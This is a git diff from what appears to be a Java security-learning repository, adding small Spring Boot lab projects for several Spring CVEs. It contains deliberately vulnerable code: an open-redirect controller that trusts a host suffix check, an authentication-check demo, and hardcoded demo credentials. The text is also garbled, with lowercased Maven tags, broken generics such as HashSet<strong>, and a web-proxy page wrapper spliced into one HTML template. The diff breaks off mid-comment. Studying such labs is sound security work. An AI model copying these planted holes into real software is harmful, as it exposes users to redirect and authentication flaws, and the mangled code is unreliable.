+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ <project.reporting.outputencoding>UTF-8</project.reporting.outputencoding>
+ <spring-boot.version>2.6.13</spring-boot.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter</artifactid>
+ </dependency>
+
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+ <dependencymanagement>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-dependencies</artifactid>
+ <version>${spring-boot.version}</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ </dependencies>
+ </dependencymanagement>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <version>3.8.1</version>
+ <configuration>
+ <source>1.8</source>
+ <target>1.8</target>
+ <encoding>UTF-8</encoding>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ <version>${spring-boot.version}</version>
+ <configuration>
+ <mainclass>com.example.server.ServerApplication</mainclass>
+ <skip>true</skip>
+ </configuration>
+ <executions>
+ <execution>
+ <id>repackage</id>
+ <goals>
+ <goal>repackage</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/src/main/java/com/example/server/ServerApplication.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/src/main/java/com/example/server/ServerApplication.java
new file mode 100644
index 00000000..9c82df8f
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/src/main/java/com/example/server/ServerApplication.java
@@ -0,0 +1,13 @@
+package com.example.server;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ServerApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ServerApplication.class, args);
+ }
+
+}
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/src/test/java/com/example/server/ServerApplicationTests.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/src/test/java/com/example/server/ServerApplicationTests.java
new file mode 100644
index 00000000..f915ff70
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/Server/src/test/java/com/example/server/ServerApplicationTests.java
@@ -0,0 +1,13 @@
+package com.example.server;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class ServerApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/pom.xml b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/pom.xml
new file mode 100644
index 00000000..851e09ec
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/pom.xml
@@ -0,0 +1,9 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>CVE-2023-34050</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - CVE-2023-34050</name>
+ <url>http://maven.apache.org</url>
+</project>
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/META-INF/maven/archetype.xml b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/META-INF/maven/archetype.xml
new file mode 100644
index 00000000..a8c70656
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/META-INF/maven/archetype.xml
@@ -0,0 +1,9 @@
+<archetype>
+ <id>CVE-2023-34050</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..ba5adcc1
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$CVE-2023-34050</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-AMQP/CVE-2023-34050/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/.gitignore b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/pom.xml b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/pom.xml
new file mode 100644
index 00000000..be3d2a71
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/pom.xml
@@ -0,0 +1,76 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-parent</artifactid>
+ <version>3.2.2</version>
+ <relativepath/> 
+ </parent>
+ <groupid>com.example</groupid>
+ <artifactid>spring-security-demo</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>spring-security-demo</name>
+ <description>spring-security-demo</description>
+ <properties>
+ <java.version>17</java.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-security</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-web</artifactid>
+ </dependency>
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.security</groupid>
+ <artifactid>spring-security-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-thymeleaf</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.thymeleaf.extras</groupid>
+ <artifactid>thymeleaf-extras-springsecurity6</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-actuator</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-security</artifactid>
+ </dependency>
+ </dependencies>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/Cve202422234Application.java b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/Cve202422234Application.java
new file mode 100644
index 00000000..998195be
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/Cve202422234Application.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Cve202422234Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Cve202422234Application.class, args);
+ }
+
+}
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/config/WebSecurityConfig.java b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/config/WebSecurityConfig.java
new file mode 100644
index 00000000..db5ef2fe
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/config/WebSecurityConfig.java
@@ -0,0 +1,44 @@
+package com.drunkbaby.config;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.core.userdetails.User;
+import org.springframework.security.core.userdetails.UserDetails;
+import org.springframework.security.core.userdetails.UserDetailsService;
+import org.springframework.security.provisioning.InMemoryUserDetailsManager;
+import org.springframework.security.web.SecurityFilterChain;
+
+@Configuration
+@EnableWebSecurity
+public class WebSecurityConfig {
+
+ @Bean
+ public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception {
+ http.authorizeHttpRequests((requests) -> requests
+ .requestMatchers("/", "/index").permitAll()
+ .anyRequest().authenticated()
+ )
+
+ .formLogin((form) -> form
+ .loginPage("/login")
+ .permitAll()
+ )
+ .logout((logout) -> logout.permitAll());
+
+ return http.build();
+ }
+
+ @Bean
+ public UserDetailsService userDetailsService() {
+ UserDetails user =
+ User.withDefaultPasswordEncoder()
+ .username("user")
+ .password("password")
+ .roles("USER")
+ .build();
+
+ return new InMemoryUserDetailsManager(user);
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/controller/IndexController.java b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/controller/IndexController.java
new file mode 100644
index 00000000..15ecbfda
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/java/com/drunkbaby/controller/IndexController.java
@@ -0,0 +1,67 @@
+package com.drunkbaby.controller;
+
+import org.springframework.security.authentication.AuthenticationTrustResolver;
+import org.springframework.security.authentication.AuthenticationTrustResolverImpl;
+import org.springframework.security.core.Authentication;
+import org.springframework.security.core.context.SecurityContextHolder;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+@Controller
+public class IndexController {
+
+ @GetMapping("/index")
+ @ResponseBody
+ public String index(){
+ // 获取当前的认证对象
+ return "success";
+ }
+
+ @GetMapping("/vul")
+ @ResponseBody
+ public String vul(Authentication authentication){
+ // 获取当前的认证对象
+ authentication = null;
+
+ // 创建 AuthenticationTrustResolver 实例
+ AuthenticationTrustResolver trustResolver = new AuthenticationTrustResolverImpl();
+
+ // 使用 isFullyAuthenticated 方法检查是否完全经过身份验证
+ boolean fullyAuthenticated = trustResolver.isFullyAuthenticated(authentication);
+ String msg = "";
+ if (fullyAuthenticated) {
+ msg = "用户已完全经过身份验证";
+ } else {
+ msg = "用户可能是匿名用户或者仅部分经过身份验证";
+ }
+ return msg;
+ }
+
+ @GetMapping("/home")
+ public String home(){
+ return "home";
+ }
+
+ @GetMapping("/hello")
+ public String hello(){
+ return "hello";
+ }
+
+ @GetMapping("/login")
+ public String login(){
+ return "login";
+ }
+
+ public static void main(String[] args) {
+ Authentication authentication = SecurityContextHolder.getContext().getAuthentication();
+
+ // 创建 AuthenticationTrustResolver 实例
+ AuthenticationTrustResolver trustResolver = new AuthenticationTrustResolverImpl();
+
+ // 使用 isFullyAuthenticated 方法检查是否完全经过身份验证
+ boolean fullyAuthenticated = trustResolver.isFullyAuthenticated(null);
+
+ System.out.println(fullyAuthenticated);
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/application.properties b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/application.properties
new file mode 100644
index 00000000..bafddced
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/application.properties
@@ -0,0 +1 @@
+server.port=8081
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/hello.html b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/hello.html
new file mode 100644
index 00000000..37b2fcb2
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/hello.html
@@ -0,0 +1,13 @@
+<!doctype html>
+<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="https://www.thymeleaf.org" + xmlns:sec="https://www.thymeleaf.org/thymeleaf-extras-springsecurity6">
+<head>
<link rel="stylesheet" href="/common/contrast.css" type="text/css" media="all" />
<meta name="robots" content="noindex,nofollow">
<meta name="robots" content="none">
<meta name="robots" content="noarchive">
<meta name="Googlebot" content="noarchive">

+ <title>Hello World!</title>
+</head>
+<body><div class="naked_container">
+<h1 th:inline="text">Hello <span th:remove="tag" sec:authentication="name">thymeleaf</span>!</h1>
+<form th:action="@{/logout}" method="post">
+ <input type="submit" value="Sign Out"/>
+</form>
+</div><div class="naked_ctrl">
<form action="/index.cgi/contrast" method="get" name="gate">
<p><a href="http://altstyle.alfasado.net">AltStyle</a> によって変換されたページ <a href="https://github.com/alone-hacker/JavaSecurityLearning/compare/main...Drun1baby:JavaSecurityLearning:main.diff">(-&gt;オリジナル)</a>
/ <label>アドレス: <input type="text" name="naked_post_url" value="https://github.com/alone-hacker/JavaSecurityLearning/compare/main...Drun1baby:JavaSecurityLearning:main.diff" size="22" /></label> <label>モード: <select name="naked_post_mode">
<option value="default">デフォルト</option>
<option value="speech">音声ブラウザ</option>
<option value="ruby">ルビ付き</option>
<option value="contrast" selected="selected">配色反転</option>
<option value="larger-text">文字拡大</option>
<option value="mobile">モバイル</option>
</select>
<input type="submit" value="表示" />
</p>
</form>
</div>		
</body>
+</html>
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/home.html b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/home.html
new file mode 100644
index 00000000..11df00bb
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/home.html
@@ -0,0 +1,11 @@
+<!doctype html>
+<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="https://www.thymeleaf.org">
+<head>
+ <title>Spring Security Example</title>
+</head>
+<body>
+<h1>Welcome!</h1>
+
+<p>Click <a th:href="@{/hello}">here</a> to see a greeting.</p>
+</body>
+</html>
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/login.html b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/login.html
new file mode 100644
index 00000000..ee6536a3
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/main/resources/templates/login.html
@@ -0,0 +1,19 @@
+<!doctype html>
+<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="https://www.thymeleaf.org">
+<head>
+ <title>Spring Security Example </title>
+</head>
+<body>
+<div th:if="${param.error}">
+ Invalid username and password.
+</div>
+<div th:if="${param.logout}">
+ You have been logged out.
+</div>
+<form th:action="@{/login}" method="post">
+ <div><label> User Name : <input type="text" name="username"/> </label></div>
+ <div><label> Password: <input type="password" name="password"/> </label></div>
+ <div><input type="submit" value="Sign In"/></div>
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/test/java/com/drunkbaby/Cve202422234ApplicationTests.java b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/test/java/com/drunkbaby/Cve202422234ApplicationTests.java
new file mode 100644
index 00000000..e036432a
--- /dev/null
+++ b/JavaSecurity/Spring/Spring-Security/CVE-2024-22234/src/test/java/com/drunkbaby/Cve202422234ApplicationTests.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202422234ApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/.gitignore b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/pom.xml b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/pom.xml
new file mode 100644
index 00000000..6b16e298
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/pom.xml
@@ -0,0 +1,76 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>com.drunkbaby</groupid>
+ <artifactid>CVE-2024-22243</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>CVE-2024-22243</name>
+ <description>CVE-2024-22243</description>
+ <properties>
+ <java.version>1.8</java.version>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ <project.reporting.outputencoding>UTF-8</project.reporting.outputencoding>
+ <spring-boot.version>2.6.13</spring-boot.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter</artifactid>
+ </dependency>
+
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-web</artifactid>
+ </dependency>
+ </dependencies>
+ <dependencymanagement>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-dependencies</artifactid>
+ <version>${spring-boot.version}</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ </dependencies>
+ </dependencymanagement>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <version>3.8.1</version>
+ <configuration>
+ <source>1.8</source>
+ <target>1.8</target>
+ <encoding>UTF-8</encoding>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ <version>${spring-boot.version}</version>
+ <configuration>
+ <mainclass>com.drunkbaby.Cve202422243Application</mainclass>
+ <skip>true</skip>
+ </configuration>
+ <executions>
+ <execution>
+ <id>repackage</id>
+ <goals>
+ <goal>repackage</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/main/java/com/drunkbaby/Cve202422243Application.java b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/main/java/com/drunkbaby/Cve202422243Application.java
new file mode 100644
index 00000000..93fdc7cc
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/main/java/com/drunkbaby/Cve202422243Application.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Cve202422243Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Cve202422243Application.class, args);
+ }
+
+}
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/main/java/com/drunkbaby/controller/VulController.java b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/main/java/com/drunkbaby/controller/VulController.java
new file mode 100644
index 00000000..1811dd52
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/main/java/com/drunkbaby/controller/VulController.java
@@ -0,0 +1,47 @@
+package com.drunkbaby.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.util.UriComponents;
+import org.springframework.web.util.UriComponentsBuilder;
+
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.util.Arrays;
+import java.util.HashSet;
+import java.util.Set;
+
+
+@Controller
+@RequestMapping("/vul")
+public class VulController {
+
+ private static final Set<string> whiteDomains = new HashSet<strong>(Arrays.asList(new String[]{
+ ".a.com"
+ }));
+
+ @GetMapping
+ public String vul(@RequestParam(name = "url") String url, HttpServletResponse response) throws IOException {
+ UriComponents uriComponents = UriComponentsBuilder.fromUriString(url).build();
+ String schema = uriComponents.getScheme();
+ String host = uriComponents.getHost();
+ String path = uriComponents.getPath();
+
+ System.out.printf("schema:%s\n", schema);
+ System.out.printf("host:%s\n", host);
+ System.out.printf("path:%s\n", path);
+
+ boolean pass = false;
+ for (String whiteDomain : whiteDomains) {
+ if (host.endsWith(whiteDomain)) {
+ pass = true;
+ break;
+ }
+ }
+ if (!pass) return "error";
+
+ return "redirect:" + url;
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/test/java/com/drunkbaby/Cve202422243ApplicationTests.java b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/test/java/com/drunkbaby/Cve202422243ApplicationTests.java
new file mode 100644
index 00000000..a42d00b7
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22243/src/test/java/com/drunkbaby/Cve202422243ApplicationTests.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202422243ApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/.gitignore b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/pom.xml b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/pom.xml
new file mode 100644
index 00000000..d7609148
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/pom.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <parent>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-parent</artifactid>
+ <version>2.7.18</version>
+ <relativepath/> 
+ </parent>
+ <modelversion>4.0.0</modelversion>
+
+ <artifactid>spring-uricomponentsbuilder-2</artifactid>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ </properties>
+
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-web</artifactid>
+ </dependency>
+ 
+ <dependency>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-web</artifactid>
+ <version>5.3.32</version>
+ </dependency>
+ </dependencies>
+
+</project>
\ No newline at end of file
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/main/java/com/drunkbaby/Cve202422259Application.java b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/main/java/com/drunkbaby/Cve202422259Application.java
new file mode 100644
index 00000000..974624c4
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/main/java/com/drunkbaby/Cve202422259Application.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Cve202422259Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Cve202422259Application.class, args);
+ }
+
+}
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/main/java/com/drunkbaby/controller/OAuthController.java b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/main/java/com/drunkbaby/controller/OAuthController.java
new file mode 100644
index 00000000..d27eaae4
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/main/java/com/drunkbaby/controller/OAuthController.java
@@ -0,0 +1,74 @@
+package com.drunkbaby.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.util.UriComponents;
+import org.springframework.web.util.UriComponentsBuilder;
+
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.util.Arrays;
+import java.util.HashSet;
+import java.util.Set;
+
+/**
+ * @author threedr3am
+ *
+ * CVE-2024-22259
+ *
+ * 使用UricomponentsBuilder解析外部提供的URL(例如通过查询参数)并对解析URL的主机执行验证检查的应用程序可能容易受到公开重定向攻击,
